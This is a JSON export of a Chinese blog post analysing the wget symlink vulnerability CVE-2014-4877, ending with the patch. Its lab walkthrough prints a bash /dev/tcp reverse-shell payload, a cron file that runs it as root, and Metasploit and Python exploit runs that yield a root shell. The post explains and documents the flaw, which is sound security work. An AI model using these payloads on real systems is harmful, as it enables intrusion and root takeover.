{"id":616,"date":"2014-11-04T09:38:58","date_gmt":"2014-11-04T09:38:58","guid":{"rendered":"http:\/\/www.selinuxplus.com\/?p=616"},"modified":"2014-11-04T09:38:58","modified_gmt":"2014-11-04T09:38:58","slug":"wget%e6%bc%8f%e6%b4%9e%e4%bf%a1%e6%81%af%e7%9b%b8%e5%85%b3el7%ef%bc%88cve-2014-4877%ef%bc%89","status":"publish","type":"post","link":"http:\/\/www.selinuxplus.com\/?p=616","title":{"rendered":"wget\u6f0f\u6d1e\u4fe1\u606f\u76f8\u5173el7\uff08CVE-2014-4877\uff09"},"content":{"rendered":"

00\u6f0f\u6d1e\u539f\u7406\uff1a<\/strong><\/p>\n

wget ftp\u4e0b\u8f7d\u7b26\u53f7\u94fe\u63a5\u6587\u4ef6\u65f6(\u6ca1\u5f00\u542fretr-symlinks \u9009\u9879),\u4f1a\u5728\u672c\u8eab\u7cfb\u7edf\u521b\u5efa\u4e00\u4e2a\u7b26\u53f7\u94fe\u63a5,\u5f53\u4f2a\u9020\u4e00\u4e2aftp \u6570\u636e\u5305\u4e2d\u6709\u7684\u6587\u4ef6\u5939\u7b26\u53f7\u94fe\u63a5\u548c\u4e00\u4e2a\u540c\u540d\u6587\u4ef6\u5939\u5e76\u4e14\u771f\u5b9e\u6587\u4ef6\u5939\u4e2d\u6709\u5b50\u6587\u4ef6\u65f6,wget\u9012\u5f52\u4e0b\u8f7d\u65f6\u4f1a\u628a\u5b50\u6587\u4ef6\u4e0b\u8f7d\u5230\u672c\u5730\u6587\u4ef6\u5939\u7b26\u53f7\u94fe\u63a5\u6307\u5411\u7684\u5730\u5740\u3002\u653b\u51fb\u8005\u901a\u8fc7\u4f2a\u9020ftp\u6570\u636e\u6d41\u53ef\u5728\u76ee\u6807\u4efb\u610f\u76ee\u5f55\u4e2d\u521b\u5efa\u6587\u4ef6\u3001\u6587\u4ef6\u5939\u3001\u8fde\u63a5\u7b26\u53f7,\u751a\u81f3\u8bbe\u7f6e\u6743\u9650\u3001\u65f6\u95f4\u7b49\u5c5e\u6027\u3002
\n\u9996\u6b21\u4e0a\u62a5\u8be5\u6f0f\u6d1e\u7ed9Wget\u5f00\u6e90\u9879\u76ee\u7ec4\u7684\u4eba\u662fRapid7\u7684\u9996\u5e2d\u5b89\u5168\u5b98HD Moore\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u88ab\u547d\u540d\u4e3aCVE-2014-4877\u3002
\n01 \u6f0f\u6d1e\u6d4b\u8bd5\uff08metasploits\uff09<\/strong><\/p>\n

[root@localhost ~]# msfpayload  cmd\/unix\/reverse_bash LHOST=192.168.8.213  LPORT=4444 R\r\n0<&91-;exec 91<>\/dev\/tcp\/192.168.8.213\/4444;sh <&91 >&91 2>&91[root@localhost ~]# \r\n[root@localhost ~]# cat > cronshell <<EOF                                       PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\r\n* * * * * root bash -c '0<&91-;exec 91<>\/dev\/tcp\/192.168.8.213\/4444;sh <&91 >&91 2>&91';rm -f \/etc\/cron.d\/cronshell\r\nEOF<\/pre>\n
\u642d\u5efamsf\u76d1\u542c\u672c\u5730\u7aef\u53e3<\/p>\n
msf >  use exploit\/multi\/handler\r\nmsf exploit(handler) > set PAYLOAD cmd\/unix\/reverse_bash\r\nPAYLOAD => cmd\/unix\/reverse_bash\r\nmsf exploit(handler) > set LHOST 192.168.8.213\r\nLHOST => 192.168.8.213\r\nmsf exploit(handler) >  set LPORT 4444\r\nLPORT => 4444\r\nmsf exploit(handler) >  run -j\r\n[*] Exploit running as background job.\r\n\r\n[*] Started reverse handler on 192.168.8.213:4444 \r\nmsf exploit(handler) > [*] Starting the payload handler...<\/pre>\n
\u642d\u5efa\u4e00\u4e2a\u653b\u51fb\u7684ftp<\/p>\n
msf exploit(handler) >  use auxiliary\/server\/wget_symlink_file_write\r\nmsf auxiliary(wget_symlink_file_write) > set TARGET_FILE \/etc\/cron.d\/cronshell\r\nTARGET_FILE => \/etc\/cron.d\/cronshell\r\nmsf auxiliary(wget_symlink_file_write) >  set TARGET_DATA file:cronshell\r\nTARGET_DATA => file:cronshell\r\nmsf auxiliary(wget_symlink_file_write) >  set SRVPORT 21\r\nSRVPORT => 21\r\nmsf auxiliary(wget_symlink_file_write) > run\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(wget_symlink_file_write) ><\/pre>\n
\u653b\u51fb\u7ed3\u679c<\/p>\n
[+] Targets should run: $ wget -m ftp:\/\/192.168.8.213:21\/\r\n[*] Server started.\r\n[*] 192.168.8.213:60178 Logged in with user 'anonymous' and password 'anonymous'...\r\n[*] 192.168.8.213:60178 -> LIST -a\r\n[*] 192.168.8.213:60178 -> CWD \/erPBysQCyEO\r\n[*] 192.168.8.213:60178 -> LIST -a\r\n[*] 192.168.8.213:60178 -> RETR cronshell\r\n[+] 192.168.8.213:60178 Hopefully wrote 182 bytes to \/etc\/cron.d\/cronshell\r\n[*] Command shell session 1 opened (192.168.8.213:4444 -> 192.168.8.213:53199) at 2014-11-04 16:56:03 +0800\r\nid\r\n[*] exec: id\r\n\r\nuid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nmsf auxiliary(wget_symlink_file_write) > \r\nmsf auxiliary(wget_symlink_file_write) > sessions\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Type        Information  Connection\r\n  --  ----        -----------  ----------\r\n  1   shell unix               192.168.8.213:4444 -> 192.168.8.213:53199 (192.168.8.213)\r\n\r\nmsf auxiliary(wget_symlink_file_write) > sessions -i 1\r\n[*] Starting interaction with 1...\r\n\r\nwhoami\r\nroot<\/pre>\n
02 \u6f0f\u6d1e\u6d4b\u8bd5\uff08wget-symlink_attack_exploit\uff09<\/strong><\/p>\n
[root@localhost ~]# python wget-symlink_attack_exploit.py \r\nftpd is listening on  127.0.0.1:21\r\nconnection from  ('127.0.0.1', 48850) conn_list 0\r\n<< USER anonymous <socket._socketobject object at 0x7f369eff8750>\r\n<< SYST  <socket._socketobject object at 0x7f369eff8750>\r\n<< PWD  <socket._socketobject object at 0x7f369eff8750>\r\n<< TYPE I <socket._socketobject object at 0x7f369eff8750>\r\n<< PASV  <socket._socketobject object at 0x7f369eff8750>\r\n<< LIST -a <socket._socketobject object at 0x7f369eff8750>\r\n<< CWD \/fakedir <socket._socketobject object at 0x7f369eff8750>\r\n<< PASV  <socket._socketobject object at 0x7f369eff8750>\r\n<< LIST -a <socket._socketobject object at 0x7f369eff8750>\r\n<< PASV  <socket._socketobject object at 0x7f369eff8750>\r\n<< RETR pwned <socket._socketobject object at 0x7f369eff8750><\/pre>\n
\u653b\u51fb\u7ed3\u679c<\/p>\n
[root@localhost ~]# ls -ln \/tmp\r\ntotal 0\r\n-rw-r--r--. 1 0 0 0 Nov  4 17:00 pwned\r\n[root@localhost ~]# ls -lh \/tmp |grep pwned\r\n-rw-r--r--. 1 root root 0 Nov  4 17:00 pwned\r\n[root@localhost ~]# ls -lh 127.0.0.1\/\r\ntotal 0\r\nlrwxrwxrwx. 1 root root 4 Nov  4 17:00 fakedir -> \/tmp<\/pre>\n
03 \u4ee3\u7801\u5206\u6790<\/strong><\/p>\n
  switch (f->type)\r\n1842         {\r\n1843         case FT_SYMLINK:\r\n1844           \/* If opt.retr_symlinks is defined, we treat symlinks as\r\n1845              if they were normal files.  There is currently no way\r\n1846              to distinguish whether they might be directories, and\r\n1847              follow them.  *\/\r\n1848           if (!opt.retr_symlinks) \/\/\u5224\u65ad\u662f\u5426\u5f00\u542f\u4e86retr-symlinks\u9009\u9879\r\n1849             {\r\n1850 #ifdef HAVE_SYMLINK\r\n1851               if (!f->linkto)\r\n1852                 logputs (LOG_NOTQUIET,\r\n1853                          _(\"Invalid name of the symlink, skipping.\\n\"));\r\n1854               else\r\n1855                 {\r\n1856                   struct_stat st;\r\n1857                   \/* Check whether we already have the correct\r\n1858                      symbolic link.  *\/\r\n1859                   int rc = lstat (con->target, &st);\r\n1860                   if (rc == 0)\r\n1861                     {\r\n1862                       size_t len = strlen (f->linkto) + 1;\r\n1863                       if (S_ISLNK (st.st_mode))\r\n1864                         {\r\n1865                           char *link_target = (char *)alloca (len);\r\n1866                           size_t n = readlink (con->target, link_target, le     n);\r\n1867                           if ((n == len - 1)\r\n1868                               && (memcmp (link_target, f->linkto, n) == 0))\r\n1869                             {\r\n1870                               logprintf (LOG_VERBOSE, _(\"\\\r\n1871 Already have correct symlink %s -> %s\\n\\n\"),\r\n1872                                          quote (con->target),\r\n1873                                          quote (f->linkto));\r\n1874                               dlthis = false;\r\n1875                               break;\r\n1876                             }\r\n1877                         }\r\n1878                     }\r\n1879                   logprintf (LOG_VERBOSE, _(\"Creating symlink %s -> %s\\n\"),\r\n1880                              quote (con->target), quote (f->linkto));\r\n1881                   \/* Unlink before creating symlink!  *\/\r\n1882                   unlink (con->target);\r\n1883                   if (symlink (f->linkto, con->target) == -1) \/\/\u672c\u5730\u5efa\u7acb\u6587\u4ef6\u7b26\u53f7\u94fe\u63a5\r\n1884                     logprintf (LOG_NOTQUIET, \"symlink: %s\\n\", strerror (err     no));\r\n1885                   logputs (LOG_VERBOSE, \"\\n\");\r\n1886                 } \/* have f->linkto *\/\r\n1887 #else  \/* not HAVE_SYMLINK *\/\r\n1888               logprintf (LOG_NOTQUIET,\r\n1889                          _(\"Symlinks not supported, skipping symlink %s.\\n\"     ),\r\n1890                          quote (con->target));\r\n1891 #endif \/* not HAVE_SYMLINK *\/<\/pre>\n
\u5982\u4e0a\u4ee3\u7801,wget \u4f1a\u901a\u8fc7symlink \u5728\u672c\u5730\u521b\u5efa\u94fe\u63a5\u6587\u4ef6,\u6307\u5411\u6570\u636e\u5305\u4e2d\u94fe\u63a5\u7684\u5730\u5740\u3002\u5f53\u4f7f\u7528 -m\/\u2013mirror\/-r\u9009\u9879\u65f6,\u9012\u5f52\u53bb\u83b7\u53d6\u540c\u540d\u6587\u4ef6\u5939 fakedir \u91cc\u9762\u7684\u6587\u4ef6,\u7531\u4e8e\u672c\u5730\u7684fakedir \u6587\u4ef6\u4e3a\u7b26\u53f7\u94fe\u63a5,\u6240\u4ee5ftp \u670d\u52a1\u5668\u4e2d\u7684\u540c\u540dfakedir \u6587\u4ef6\u5939\u5b50\u5c42\u4e0b\u9762\u7684\u90fd\u4f1a\u88ab\u4e0b\u8f7d\u5230\u94fe\u63a5\u6587\u4ef6\u6307\u5411\u7684\u5730\u5740\u3002
\n04 \u4ee3\u7801\u4fee\u590d<\/strong>
\ncentos\/redhat \u63d0\u4f9b\u7684patch<\/p>\n
wget-1.14-CVE-2014-4877.patch\r\nhttps:\/\/git.centos.org\/blob\/rpms!wget.git\/96e81dcc5e090f23f3d8b46f0c9bd3a76617aa25\/SOURCES!wget-1.14-CVE-2014-4877.patch<\/pre>\n","protected":false},"excerpt":{"rendered":"
00\u6f0f\u6d1e\u539f\u7406\uff1a wget ftp\u4e0b\u8f7d\u7b26\u53f7\u94fe\u63a5\u6587\u4ef6\u65f6…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[103],"tags":[124,138,13],"_links":{"self":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/616"}],"collection":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=616"}],"version-history":[{"count":1,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/616\/revisions"}],"predecessor-version":[{"id":617,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=\/wp\/v2\/posts\/616\/revisions\/617"}],"wp:attachment":[{"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=616"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=616"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.selinuxplus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=616"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}